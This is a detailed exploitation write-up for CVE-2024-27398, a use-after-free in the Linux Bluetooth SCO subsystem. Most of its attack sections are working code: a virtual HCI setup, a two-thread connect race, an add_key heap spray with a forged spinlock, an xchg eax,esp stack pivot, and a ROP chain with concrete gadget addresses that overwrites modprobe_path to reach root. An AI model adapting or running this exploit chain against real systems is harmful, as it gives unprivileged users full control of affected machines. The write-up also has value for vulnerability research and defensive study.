CVE-2024-27398 - Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass

Publisher: Anonymous

Publication Date: April 25, 2026

Introduction

A few months ago I came across sty886/sco-race-condition on GitHub. It was a clean, minimal diff against net/bluetooth/sco.c that introduced a race condition triggering a use-after-free in the Bluetooth SCO subsystem. It is the kind of bug that looks almost innocent on its own, until you realize the freed object carries a function pointer that gets called from a workqueue timer.

I decided to take it all the way: from the raw bug, through kernel structure analysis, heap spray design, SMEP bypass engineering, and finally a working Local Privilege Escalation that reaches uid=0 from an unprivileged process. Every screenshot in this writeup was captured live from a real QEMU/KVM run — no synthetic output, no fabricated terminal dumps.

The audience I have in mind is someone who already knows what a kernel heap allocator is, can read C comfortably, and wants to understand every decision made along the exploitation path — not just the happy ending.


1. The Vulnerability

1.1 Vulnerable Code

The bug lives in net/bluetooth/sco.c. The sco_sock_timeout function is scheduled as a delayed_work entry on the system workqueue and fires when a SCO connection attempt times out:

static void sco_sock_timeout(struct work_struct *work)
{
    struct sco_conn *conn = container_of(work, struct sco_conn,
                                         timeout_work.work);
    struct sock *sk;

    sk = conn->sk;
    if (!sk)
        return;

    bh_lock_sock(sk);           /* [1] acquires sk->sk_lock.slock */
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);    /* [2] ← function pointer call     */
    bh_unlock_sock(sk);
    sock_put(sk);               /* [3] drops refcount               */
}

Step [2] is the critical one. If sk was already freed and the memory was reclaimed and overwritten by an attacker-controlled allocation, then sk->sk_state_change becomes an arbitrary function pointer — and calling it gives us RIP control inside kernel context.

The question is: how do we get sk freed while a timer that still references it is pending?

1.2 The Race Condition

The answer comes from a locking deficiency in sco_sock_connect() and sco_connect(). The patch in the repository removes and relocates lock_sock() calls in a way that allows two concurrent connect() calls on the same socket to proceed simultaneously:

 sco_connect() inside sco_sock_connect():
-    lock_sock(sk);         /* was here: serialized connect attempts */

     err = sco_chan_add(conn, sk, NULL);
     if (sk->sk_state == BT_CONNECTED)
         sco_sock_set_timer(sk, sk->sk_sndtimeo);

-    release_sock(sk);

And in sco_sock_connect() itself:

+    lock_sock(sk);
     if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+        release_sock(sk);
         return -EBADFD;
     }
-    lock_sock(sk);
     bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
-    release_sock(sk);

     err = sco_connect(sk);
-    lock_sock(sk);
     err = bt_sock_wait_state(...);

With these changes, two threads can simultaneously call connect() on the same SCO socket with different Bluetooth destination addresses. Each call creates its own sco_conn object and schedules its own timeout timer. But when close() is called, only the currently active connection's timer is cancelled — the other one becomes an orphan, still pointing at conn->sk, which is about to be freed.

1.3 Race Timeline

Thread 1 (c1)                 Thread 2 (c2)               Kernel workqueue
──────────────────────────────────────────────────────────────────────────
pthread_barrier_wait() ─────> pthread_barrier_wait()
                    (both released simultaneously)
connect(fd, addr=00:00:...) ─────────────────────────>
                              connect(fd, addr=FF:FF:...) ──────────────>
                    
                    sco_connect() × 2 run concurrently
                    conn_A created, timer_A scheduled (2s)
                    conn_B created, timer_B scheduled (2s)
                    sco_pi(sk)->conn = conn_B  (last writer wins)

close(fd) ──────────────────────────────────────────────────────────────>
          sco_sock_clear_timer() → cancel_delayed_work(conn_B->timeout)
          ↑ only conn_B! conn_A's timer is STILL LIVE
          sk freed (kfree) ← refcount drops to zero

                                                  ~2 seconds later:
                                                  timer_A fires
                                                  sco_sock_timeout(conn_A)
                                                  conn_A->sk = freed memory
                                                  USE-AFTER-FREE ← HERE

The key detail: cancel_delayed_work() only operates on sco_pi(sk)->conn->timeout_work, which after the race points to conn_B. conn_A is orphaned. Its timer fires against freed memory.
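The orphaning can be reproduced in a toy userspace model. The sketch below is not kernel code: `toy_sock`, `toy_conn`, and the helper functions are hypothetical stand-ins that only model the bookkeeping (one connection slot per socket, one timer per connection).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-ins for struct sock and struct sco_conn. */
struct toy_sock;

struct toy_conn {
    struct toy_sock *sk;    /* back-pointer, like conn->sk */
    bool timer_pending;     /* models conn->timeout_work being queued */
};

struct toy_sock {
    struct toy_conn *conn;  /* like sco_pi(sk)->conn: a single slot */
    bool freed;
};

/* Models one connect(): attach a connection and arm its timer. */
static inline void toy_connect(struct toy_sock *sk, struct toy_conn *c)
{
    assert(sk != NULL && c != NULL);
    c->sk = sk;
    c->timer_pending = true;
    sk->conn = c;           /* last writer wins */
}

/* Models close(): only the timer reachable through sk->conn is cancelled. */
static inline void toy_close(struct toy_sock *sk)
{
    if (sk->conn)
        sk->conn->timer_pending = false;
    sk->freed = true;
}

/* A pending timer whose back-pointer refers to a freed socket is the UAF. */
static inline bool toy_timer_is_dangling(const struct toy_conn *c)
{
    return c->timer_pending && c->sk != NULL && c->sk->freed;
}
```

Calling `toy_connect()` twice with two different connections and then `toy_close()` leaves the first connection's timer dangling, which is the conn_A situation in the timeline.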

1.4 The Official Patch

CVE-2024-27398 was fixed by three coordinated changes:

  1. `sco_conn_lock` mutex — added to struct sco_conn to serialize access

  2. `sock_hold(sk)` before scheduling the timer, paired with sock_put(sk) at the end of sco_sock_timeout — prevents the socket from being freed while the timer is pending

  3. `cancel_delayed_work_sync()` in sco_conn_del() — ensures the work is fully cancelled (including waiting for it to finish) before the connection structure is torn down

The patched sco_sock_timeout ends with sock_put(sk) to release the reference held by sock_hold. Our vulnerable kernel has this sock_put removed and sco_conn_del reverted to the unprotected version.
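To see why the sock_hold/sock_put pairing closes the hole, here is a minimal reference-count sketch. `toy_ref`, `toy_hold`, and `toy_put` are hypothetical names; the real kernel helpers operate on struct sock and do considerably more.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical refcounted object standing in for struct sock. */
struct toy_ref {
    int refcnt;
    bool freed;
};

/* Take an extra reference, as sock_hold() would before arming the timer. */
static inline void toy_hold(struct toy_ref *o)
{
    assert(!o->freed);
    o->refcnt++;
}

/* Drop a reference; the object is released only when the last one goes. */
static inline void toy_put(struct toy_ref *o)
{
    assert(o->refcnt > 0);
    if (--o->refcnt == 0)
        o->freed = true;
}
```

With the extra hold in place, the put performed by close() leaves the count at one, and the object is only released when the timer handler does its own put.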


2. Lab Setup

2.1 Kernel Configuration

The exploit requires a custom-built Linux 6.8 kernel. Key configuration choices:

# Bluetooth subsystem — built-in, not as modules
CONFIG_BT=y
CONFIG_BT_BREDR=y
CONFIG_BT_HCIVHCI=y        # Virtual HCI — exposes /dev/vhci

# Kernel memory allocator
CONFIG_SLUB=y
CONFIG_SLAB_MERGE_DEFAULT=y # SLUB cache merging enabled

# Required OFF for heap spray to work
# CONFIG_KASAN is not set          (KASAN prevents SLUB merging)
# CONFIG_MEMCG_KMEM is not set     (otherwise GFP_KERNEL_ACCOUNT
#                                   creates a separate kmalloc-cg-1024)

# Debug extensions that widen the race window
CONFIG_DEBUG_SPINLOCK=y     # spinlock_t grows from 4 to 24 bytes
                            # Forces sco_pinfo into kmalloc-1024

# Key subsystem for heap spray
CONFIG_KEYS=y

# Lock dependency checker — must be OFF
# CONFIG_LOCKDEP is not set   (validator crashes on our fake locks)

Why `CONFIG_KASAN=n`? With generic KASAN compiled in, slab caches are tagged with the SLAB_KASAN flag at creation time, and SLUB treats that flag as unmergeable (it is part of the SLAB_NEVER_MERGE mask). With KASAN on, the dedicated "SCO" slab (registered by proto_register(&sco_proto, 1)) therefore cannot merge with kmalloc-1024, so our add_key spray allocations never land in the freed socket's slot.

Why `CONFIG_MEMCG_KMEM=n`? For a related reason: SLAB_ACCOUNT is part of SLAB_MERGE_SAME, the bitmask of flags that must match before SLUB merges two caches. With MEMCG_KMEM on, proto_register passes a non-zero SLAB_ACCOUNT but kmalloc-1024 does not carry it, which prevents the merge.

With both off: SLAB_ACCOUNT = 0, SLAB_KASAN is absent, SLUB freely merges "SCO" (984 bytes, rounded to 1024) with kmalloc-1024. The freed sco_pinfo is now reachable by generic kmalloc(1004) calls — exactly what add_key performs.
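The merge decision can be sketched as a tiny predicate. This is a simplified model, not the kernel's own merge logic: the flag values and every `TOY_`/`toy_` name are made up for illustration, size and alignment checks are left out, and placing the KASAN flag on the never-merge list reflects my reading of mm/slab_common.c.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical bit values; the real ones live in include/linux/slab.h. */
#define TOY_SLAB_ACCOUNT 0x1u   /* compiled to 0 when MEMCG_KMEM is off */
#define TOY_SLAB_KASAN   0x2u   /* only set on KASAN builds */

#define TOY_MERGE_SAME   (TOY_SLAB_ACCOUNT)  /* flags that must match */
#define TOY_NEVER_MERGE  (TOY_SLAB_KASAN)    /* flags that forbid merging */

static_assert((TOY_MERGE_SAME & TOY_NEVER_MERGE) == 0,
              "the two flag sets are disjoint in this model");

/* Two caches may share slabs only if neither carries a never-merge flag
 * and their must-match flags are identical. */
static inline bool toy_can_merge(unsigned int new_flags,
                                 unsigned int existing_flags)
{
    if ((new_flags | existing_flags) & TOY_NEVER_MERGE)
        return false;
    return (new_flags & TOY_MERGE_SAME) == (existing_flags & TOY_MERGE_SAME);
}
```

In this model the lab configuration corresponds to `toy_can_merge(0, 0)`, while a KASAN or MEMCG_KMEM build corresponds to passing the respective flag on the "SCO" side only.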

2.2 QEMU Launch Parameters

qemu-system-x86_64 \
    -m 4096 \
    -smp 2 \
    -cpu host,+smep,-smap \
    -enable-kvm \
    -kernel linux-6.8/arch/x86/boot/bzImage \
    -initrd exploit.cpio.gz \
    -append "console=ttyS0 nokaslr loglevel=7 \
             panic_on_oops=0 hung_task_timeout_secs=0 \
             lockdep=off" \
    -nographic \
    -no-reboot

Notable parameters:

Parameter               Reason
-cpu host,+smep,-smap   SMEP on (forces us to use pure ROP); SMAP off (kernel can read the userspace pivot page)
nokaslr                 All kernel addresses are fixed, so no info leak is needed
panic_on_oops=0         The kernel oops at RIP=0x0 does not kill the machine, so the exploit continues
lockdep=off             Lock validator would trip on our fake-but-valid spinlock spray data
-smp 2                  Two CPUs are required for the race to be meaningful


3. Target Structure Analysis

3.1 struct sco_pinfo Layout

struct sco_pinfo is the per-socket private data for Bluetooth SCO sockets. Its first member is struct sock sk, which contains all the generic socket fields we care about:

struct sco_pinfo {
    struct sock    sk;       /* must be first — pointer cast magic */
    bdaddr_t       src;
    bdaddr_t       dst;
    __u32          flags;
    __u16          setting;
    __u8           cmsg_mask;
    struct bt_codec codec;
    struct sco_conn *conn;
};

With CONFIG_DEBUG_SPINLOCK=y, spinlock_t expands from 4 bytes to 24 bytes (adding magic, owner_cpu, owner fields for debugging). This inflates struct sock and pushes sco_pinfo to 984 bytes:

$ pahole -C sco_pinfo vmlinux
struct sco_pinfo {
    struct sock  sk;     /* 0   904 */  ← includes debug spinlock expansion
    ...                  /* 904  80 */
    /* size: 984, cachelines: 16, members: 7 */
};

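SLUB does not pack 984-byte objects back to back. proto_register() creates the "SCO" cache with SLAB_HWCACHE_ALIGN, so the object size is rounded up to a multiple of the cache line size (64 bytes on x86-64). That gives 1024 bytes, the same slot size as kmalloc-1024. This is our target cache.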
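The 984 → 1024 step is plain align-up arithmetic. A minimal sketch, assuming a 64-byte cache line and that SLAB_HWCACHE_ALIGN rounds the object size to that alignment; `align_up` is a local helper here, not a kernel symbol.

```c
#include <assert.h>
#include <stddef.h>

/* Round size up to the next multiple of align (align must be a power of two). */
static inline size_t align_up(size_t size, size_t align)
{
    assert(align != 0 && (align & (align - 1)) == 0);
    return (size + align - 1) & ~(align - 1);
}
```

`align_up(984, 64)` evaluates to 1024, the slot size the spray has to match.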

3.2 Critical Offsets in struct sock

$ pahole -C sock vmlinux | grep -E "sk_lock|sk_state_change"
    socket_lock_t  sk_lock;              /*  152    72 */
    void (*sk_state_change)(struct sock *); /* 824     8 */

Two fields matter enormously:

`sk_lock` at offset `0x98` (152): socket_lock_t contains a spinlock_t as its first member. bh_lock_sock(sk) in sco_sock_timeout tries to acquire sk->sk_lock.slock. If this spinlock contains invalid data, the kernel crashes before we ever reach sk_state_change. Our spray must provide a valid-looking unlocked spinlock here.

`sk_state_change` at offset `0x338` (824): The function pointer we're overwriting. When sco_sock_timeout calls sk->sk_state_change(sk), this is our entry point into RIP control.

3.3 socket_lock_t Internals (DEBUG_SPINLOCK=y)

socket_lock_t (72 bytes total):
  +0x00  spinlock_t slock (24 bytes):
           +0x00  raw_lock.val   (4B)  ← 0 = unlocked
           +0x04  magic          (4B)  ← MUST be 0xdead4ead
           +0x08  owner_cpu      (4B)  ← -1 = unowned
           +0x0C  pad            (4B)
           +0x10  owner          (8B)  ← (void*)-1 = unowned
  +0x18  owned                  (4B)
  +0x1C  pad                    (4B)
  +0x20  wq (wait_queue_head_t) (40B)

The magic field is checked by do_raw_spin_lock() on every lock acquisition. If it doesn't equal 0xdead4ead, the kernel prints a warning and potentially panics. We must set it correctly in our spray payload.
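The layout above can be mirrored in userspace to double-check the offsets. This is only a model of the 24-byte debug spinlock as described in this section: the `toy_` names are hypothetical, and the real kernel performs additional owner checks that are not reproduced here.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_SPINLOCK_MAGIC 0xdead4eadu

/* Userspace mirror of the debug spinlock layout listed above. */
struct toy_debug_spinlock {
    uint32_t raw_lock;   /* +0x00: 0 = unlocked */
    uint32_t magic;      /* +0x04: must equal TOY_SPINLOCK_MAGIC */
    uint32_t owner_cpu;  /* +0x08: 0xffffffff = unowned */
    uint32_t pad;        /* +0x0c */
    uint64_t owner;      /* +0x10: all ones = unowned */
};

static_assert(sizeof(struct toy_debug_spinlock) == 24, "24-byte layout");
static_assert(offsetof(struct toy_debug_spinlock, magic) == 0x04, "magic offset");
static_assert(offsetof(struct toy_debug_spinlock, owner_cpu) == 0x08, "owner_cpu offset");
static_assert(offsetof(struct toy_debug_spinlock, owner) == 0x10, "owner offset");

/* True if the lock image looks initialized, unlocked, and unowned. */
static inline bool toy_lock_looks_idle(const struct toy_debug_spinlock *l)
{
    return l->raw_lock == 0 &&
           l->magic == TOY_SPINLOCK_MAGIC &&
           l->owner_cpu == UINT32_MAX &&
           l->owner == UINT64_MAX;
}
```

The static assertions fail at compile time if the mirrored struct ever drifts from the offsets in the table.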


4. Exploit Stage 1: Triggering the UAF

4.1 Virtual HCI Setup

We don't need physical Bluetooth hardware. Linux's hci_vhci driver exposes /dev/vhci, which creates a virtual HCI controller (hci0):

/* Open virtual HCI device */
vfd = open("/dev/vhci", O_RDWR);

/* Initialize as BR/EDR controller */
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);

/* Start HCI command response thread */
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);

/* Bring up the hci0 interface */
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(hfd, HCIDEVUP, 0);   /* _IOW(0x48, 201, int) */
close(hfd);

sleep(4);  /* wait for HCI initialization sequence to complete */
printf("[*] HCI ready\n");

The vhci_thread responds to every HCI command the kernel sends during initialization. The most important response is to HCI_Create_Connection (opcode 0x0401) — we send back a fake Connection Complete event with handle=1, which satisfies the kernel's connection state machine and allows subsequent SCO connect attempts to proceed:

case 0x0401: {  /* HCI_Create_Connection */
    uint8_t ev[20] = {0};
    ev[0] = 4;     /* HCI_EVENT_PKT */
    ev[1] = 0x03;  /* HCI_EV_CONN_COMPLETE */
    ev[2] = 11;    /* parameter length */
    ev[3] = 0;     /* status = success */
    ev[4] = 0x01; ev[5] = 0x00;   /* handle = 1 */
    memcpy(&ev[6], &buf[4], 6);   /* copy BD_ADDR from command */
    ev[12] = 0x01; ev[13] = 0x00; /* link type = ACL, enc = off */
    write(vfd, ev, 14);
    break;
}

4.2 Race Trigger per Iteration

Each race attempt follows the same pattern:

g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET | SOCK_NONBLOCK, BTPROTO_SCO);

/* 2-second connection timeout — this is what sco_sock_set_timer() uses */
struct timeval tv = {.tv_sec = 2};
setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));

/* Synchronize both connect() calls at a single barrier */
pthread_barrier_init(&g_bar, NULL, 2);
pthread_t t1, t2;
pthread_create(&t1, NULL, c1, NULL);  /* connect to 00:00:00:00:00:00 */
pthread_create(&t2, NULL, c2, NULL);  /* connect to FF:FF:FF:FF:FF:FF */
pthread_join(t1, NULL);
pthread_join(t2, NULL);
pthread_barrier_destroy(&g_bar);

/* close() frees sk; orphan conn_A timer still pending */
close(g_fd);

Immediately after close(), the heap spray must fill the freed slot before the workqueue fires.

Figure 1: Exploit startup. The xchg eax,esp gadget at 0xffffffff81011cf1 is selected as the stack pivot. Two userspace pages are mapped: the pivot page at 0x81011000 holding the ROP chain, and the string page at 0xdead0000 holding "/tmp/x\0".

After the 4-second HCI initialization wait, hci0 is ready and the exploit begins its first batch:

Figure 2: "HCI ready" — the virtual Bluetooth controller is up and the kernel Bluetooth stack has completed its initialization sequence. Race + spray iterations begin.


5. Exploit Stage 2: Heap Spray via add_key

5.1 Why add_key?

The add_key(2) system call — specifically add_key("user", desc, data, datalen, keyring) — allocates a user_key_payload in the kernel:

/* security/keys/user_defined.c (simplified) */
struct user_key_payload *prep =
    kmalloc(sizeof(*prep) + datalen, GFP_KERNEL);

sizeof(struct user_key_payload) is exactly 24 bytes:

struct user_key_payload:
  +0x00  struct rcu_head rcu   (16 bytes = 2 × sizeof(void*))
  +0x10  unsigned short datalen (2 bytes)
  +0x12  [6 bytes padding for 8-byte alignment]
  +0x18  char data[]           ← our controlled payload starts here

With datalen = 980, the allocation is 24 + 980 = 1004 bytes → kmalloc-1024. This is exactly the cache where freed sco_pinfo objects reside when KASAN and MEMCG_KMEM are both disabled (SLUB merges the "SCO" dedicated cache into kmalloc-1024).
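The size-class arithmetic can be checked with a small helper. This is a rough model that only covers the power-of-two kmalloc buckets from 256 bytes upward (the 96- and 192-byte caches are deliberately ignored); `toy_kmalloc_bucket` and `toy_key_alloc_size` are illustrative names, not kernel functions.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_KEY_HDR 24u  /* sizeof(struct user_key_payload), per the layout above */

/* Smallest power-of-two bucket that fits size, for 192 < size <= 8192. */
static inline size_t toy_kmalloc_bucket(size_t size)
{
    size_t bucket = 256;

    assert(size > 192 && size <= 8192);  /* the model does not apply outside this range */
    while (bucket < size)
        bucket <<= 1;
    return bucket;
}

/* Total allocation size for an add_key("user", ...) payload of datalen bytes. */
static inline size_t toy_key_alloc_size(size_t datalen)
{
    return TOY_KEY_HDR + datalen;
}
```

A 980-byte payload gives a 1004-byte allocation, which this model places in the 1024-byte bucket; one byte over 1000 bytes of payload would already spill into the 2048-byte bucket.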

5.2 Spray Payload Layout

The freed sco_pinfo starts at what was sk (offset 0). Our user_key_payload data starts 24 bytes into the allocation. So to overwrite a field at sk + N, we write to payload_data[N - 24]:

Allocation layout (1024 bytes total):
┌──────────────────────────────────────────────────────┐
│ user_key_payload header (24 bytes)                    │
│   +0x00 rcu_head (16B) │ datalen (2B) │ pad (6B)     │
├──────────────────────────────────────────────────────┤  ← payload_data[0]
│ [maps to sk+0x18]                                    │
│   ...                                                │
│ [maps to sk+0x98 = sk_lock.slock]                    │
│   payload_data[0x80]  raw_lock   = 0x00000000        │  ← unlocked
│   payload_data[0x84]  magic      = 0xdead4ead        │  ← REQUIRED
│   payload_data[0x88]  owner_cpu  = 0xffffffff        │  ← -1 (unowned)
│   payload_data[0x8c]  pad        = 0x00000000        │
│   payload_data[0x90]  owner      = 0xffffffffffffffff│  ← (void*)-1
│   ...                                                │
│ [maps to sk+0x338 = sk_state_change]                 │
│   payload_data[0x320] = 0xffffffff81011cf1           │  ← our gadget
└──────────────────────────────────────────────────────┘

The corresponding C code:

static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* user_key_payload header size */

    /* sk+0x98: valid unlocked DEBUG_SPINLOCK */
    int slock = SK_LOCK_OFF - h;  /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;           /* raw_lock = unlocked */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;  /* magic — checked by kernel */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;  /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* sk+0x338: overwrite sk_state_change with our pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
    /* SK_STCHG_OFF=0x338, h=0x18, so payload_data[0x320] = gadget addr */
}

5.3 The Spray Loop

for (int batch = 0; batch < 100; batch++) {
    /* 2000 race attempts + 2000 add_key calls per batch */
    for (int i = 0; i < BATCH_SZ; i++) {
        /* [1] Trigger race → create orphan timer → free sk */
        g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK, BTPROTO_SCO);
        setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
        pthread_barrier_init(&g_bar, NULL, 2);
        pthread_create(&t1, NULL, c1, NULL);
        pthread_create(&t2, NULL, c2, NULL);
        pthread_join(t1, NULL); pthread_join(t2, NULL);
        pthread_barrier_destroy(&g_bar);
        close(g_fd);  /* ← sk freed here */

        /* [2] Spray — try to land in the freed slot */
        char desc[32];
        snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
        syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd), KEY_SPEC_SESSION_KEYRING);
    }

    /* [3] Wait for orphan timers to fire */
    printf("[*] Waiting 3s...\n");
    sleep(3);

    /* [4] Trigger modprobe if modprobe_path was overwritten */
    for (int t = 0; t < 5; t++) {
        system("/tmp/dummy 2>/dev/null; true");
        usleep(500000);
        if (access("/tmp/pwn", F_OK) == 0) goto win;
    }
}

Figure 3: Batch 0 in progress. Each iteration creates a new SCO socket, runs the two-thread connect race, closes the socket (freeing `sk`), and immediately calls `add_key` to fill the freed slot with our gadget-carrying payload.

Figure 4: After 2000 iterations, we wait 3 seconds for the `SO_SNDTIMEO=2s` delayed work timers to fire. Any `sco_sock_timeout` that runs against a successfully sprayed object will call our overwritten `sk_state_change`.


6. Exploit Stage 3: UAF Fires — KASAN Detection

To demonstrate the UAF concretely, here is the KASAN report from a KASAN-enabled build of the same kernel. KASAN catches the freed-memory access inside do_raw_spin_lock, called from sco_sock_timeout via bh_lock_sock:

Figure 5: KASAN reports `BUG: KASAN: slab-use-after-free in do_raw_spin_lock+0x247/0x270`. The read of 4 bytes at the freed address is the magic field check inside the DEBUG_SPINLOCK validation path. The workqueue entry is explicitly labeled `"events sco_sock_timeout"`.

The full KASAN output captures the exact access pattern:

[54.422702] BUG: KASAN: slab-use-after-free in do_raw_spin_lock+0x247/0x270
[54.425697] Read of size 4 at addr ffff888104a9409c by task kworker/1:1/34

[54.429273] CPU: 1 PID: 34 Comm: kworker/1:1 Tainted: G  W  6.8.0 #22
[54.438542] Workqueue: events sco_sock_timeout
[54.439757] Call Trace:
[54.442072]  <TASK>
[54.443113]  dump_stack_lvl+0x72/0xa0
[54.444173]  print_report+0xcf/0x660
[54.461068]  kasan_report+0xc7/0x100
[54.462105]  do_raw_spin_lock+0x247/0x270   ← reads sk_lock.magic
[54.469960]  sco_sock_timeout+0x4a/0xd0     ← bh_lock_sock(sk) → UAF
[54.471052]  process_one_work+0x623/0xec0

The address ffff888104a9409c is sk + 0x9c — the magic field of sk_lock.slock inside the freed object. With KASAN enabled the spray cannot reclaim this object (separate slab), so the magic reads as whatever poison value KASAN wrote. With KASAN disabled, our spray fills this field with 0xdead4ead and bh_lock_sock proceeds without complaint.

Figure 6: Same KASAN run showing the `sco_sock_timeout` workqueue context more clearly. The work item runs on `CPU 1` in `kworker/1:1`, approximately 54 seconds into the session, when the 2-second `SO_SNDTIMEO` timer armed during connect() expires after the socket has already been closed.

In the exploitation kernel (KASAN off), the UAF is silent. bh_lock_sock reads our sprayed magic (0xdead4ead), passes validation, locks successfully, and execution continues to sk->sk_state_change(sk) with our overwritten pointer.


7. Exploit Stage 4: SMEP Bypass via xchg eax, esp

7.1 Why We Can't Jump to Shellcode

SMEP (Supervisor Mode Execution Prevention) is a CPU feature that raises a page fault when code running in supervisor mode fetches an instruction from a page marked user-accessible in the page tables. On x86-64 Linux that covers everything userspace can map, all of which sits in the lower canonical half (at or below 0x00007fffffffffff). A naive exploit that sets sk_state_change to a pointer into a userspace shellcode buffer will immediately trigger a SMEP violation and oops.

The standard answer to SMEP is Return-Oriented Programming (ROP): all code that executes in kernel mode consists entirely of gadgets from kernel .text (which is in supervisor-mode virtual address space). We never execute a single instruction from userspace.

But we still need our ROP chain data (the sequence of gadget addresses) to live somewhere the kernel stack pointer can reach. If the kernel's current %rsp is deep in the kernel stack, we need to redirect it to somewhere we control. That's the stack pivot.

7.2 The xchg eax, esp; ret Gadget

Scanning the kernel's .text section for the two-byte sequence 94 c3 (xchg eax, esp followed by ret) yields thousands of hits. We use the one at:

0xffffffff81011cf1:  94        xchg   eax, esp
0xffffffff81011cf2:  c3        ret

Here is what happens when sk->sk_state_change(sk) is called with this gadget address:

1. sk->sk_state_change = 0xffffffff81011cf1 (our planted value)
2. The compiler generates: mov rax, [sk + 0x338]; call rax
   → Before the call, rax = 0xffffffff81011cf1
3. call rax: pushes return address, jumps to 0xffffffff81011cf1
   → rax still = 0xffffffff81011cf1 (call does not clear rax)
4. xchg eax, esp executes:
   → eax (low 32 bits of rax) = 0x81011cf1
   → old esp → eax (we don't care about this value)
   → rsp ← zero-extend(0x81011cf1) = 0x0000000081011cf1  ← USERSPACE!
5. ret executes:
   → pops new rip from [rsp = 0x0000000081011cf1]
   → that address contains rop[0] = our first ROP gadget

The result: the kernel's stack pointer is now inside our mmap'd userspace page at 0x81011000. SMEP doesn't care — no code is executed from userspace. The kernel is just reading stack data from there, which is a SMAP concern, not SMEP. And SMAP is disabled in our QEMU configuration (-smap).
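The pivot address follows from one architectural rule: a write to a 32-bit register on x86-64 zero-extends into the full 64-bit register. The sketch below just reproduces that arithmetic; the `toy_` helpers are illustrative names and the gadget address is the one quoted above.

```c
#include <assert.h>
#include <stdint.h>

/* After `xchg eax, esp`, RSP holds the low 32 bits of the old RAX,
 * zero-extended to 64 bits. */
static inline uint64_t toy_rsp_after_xchg(uint64_t rax)
{
    return (uint64_t)(uint32_t)rax;
}

/* Base address of the 4 KiB page that contains addr. */
static inline uint64_t toy_page_base(uint64_t addr)
{
    return addr & ~UINT64_C(0xfff);
}

/* Compile-time check against the value quoted in the text. */
static_assert((uint64_t)(uint32_t)0xffffffff81011cf1ULL == 0x81011cf1ULL,
              "low 32 bits of the gadget address");
```

For the gadget at 0xffffffff81011cf1 this yields a stack pointer of 0x81011cf1, inside the page that starts at 0x81011000.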

7.3 Mapping the Pivot Page

#define XCHG_EAX_ESP  0xffffffff81011cf1UL
#define PIVOT_ADDR    (XCHG_EAX_ESP & 0xFFFFFFFF)  /* 0x81011cf1 */

/* Map two pages spanning 0x81011000–0x81012fff
 * (PIVOT_ADDR is not page-aligned; ROP chain may cross a page boundary) */
void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);  /* 0x81011000 */
void *pp = mmap(pivot_page, 2 * PAGE_SIZE,
                PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                -1, 0);
memset(pp, 0, 2 * PAGE_SIZE);   /* zero-fill: trailing rop slots = 0x0 */

7.4 Building the ROP Chain

The goal is to overwrite modprobe_path with /tmp/x. We need memcpy(modprobe_path, string_page, 7). The first three integer argument registers in the x86-64 System V ABI are rdi, rsi, and rdx, so we need a pop gadget for each:

/* Kernel #23 (6.8.0, no KASAN, nokaslr) gadget addresses */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* pop rdi; ret */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* pop rsi; ret */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* pop rdx; ret */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* modprobe_path symbol */
#define STRING_PAGE    0xdead0000UL          /* userspace: "/tmp/x\0" */

uint64_t *rop = (uint64_t*)(PIVOT_ADDR);    /* 0x81011cf1 */

rop[0] = POP_RDI_RET;    /* pop rdi; ret           */
rop[1] = MODPROBE_PATH;  /*   rdi = &modprobe_path  */
rop[2] = POP_RSI_RET;    /* pop rsi; ret           */
rop[3] = STRING_PAGE;    /*   rsi = 0xdead0000 ("/tmp/x\0") */
rop[4] = POP_RDX_RET;    /* pop rdx; ret           */
rop[5] = 7;              /*   rdx = 7               */
rop[6] = MEMCPY_ADDR;    /* memcpy(dst, src, len)  */
rop[7] = XCHG_EAX_ESP + 1; /* 0xffffffff81011cf2: just 'ret' */
                             /* cascade into zeroed memory → RIP=0 → oops */

Memory layout of the pivot page after setup:

0x81011000  [page boundary]
    ...
0x81011cf1  rop[0] = 0xffffffff8104c1ad  pop rdi; ret
0x81011cf9  rop[1] = 0xffffffff8356a020  modprobe_path
0x81011d01  rop[2] = 0xffffffff811bb9be  pop rsi; ret
0x81011d09  rop[3] = 0x00000000dead0000  STRING_PAGE
0x81011d11  rop[4] = 0xffffffff810bc1b2  pop rdx; ret
0x81011d19  rop[5] = 0x0000000000000007  length = 7
0x81011d21  rop[6] = 0xffffffff82905e70  memcpy
0x81011d29  rop[7] = 0xffffffff81011cf2  trailing ret
0x81011d31  0x0000000000000000           ← crash here (RIP=0)
    ...
0x81013000  [page boundary]
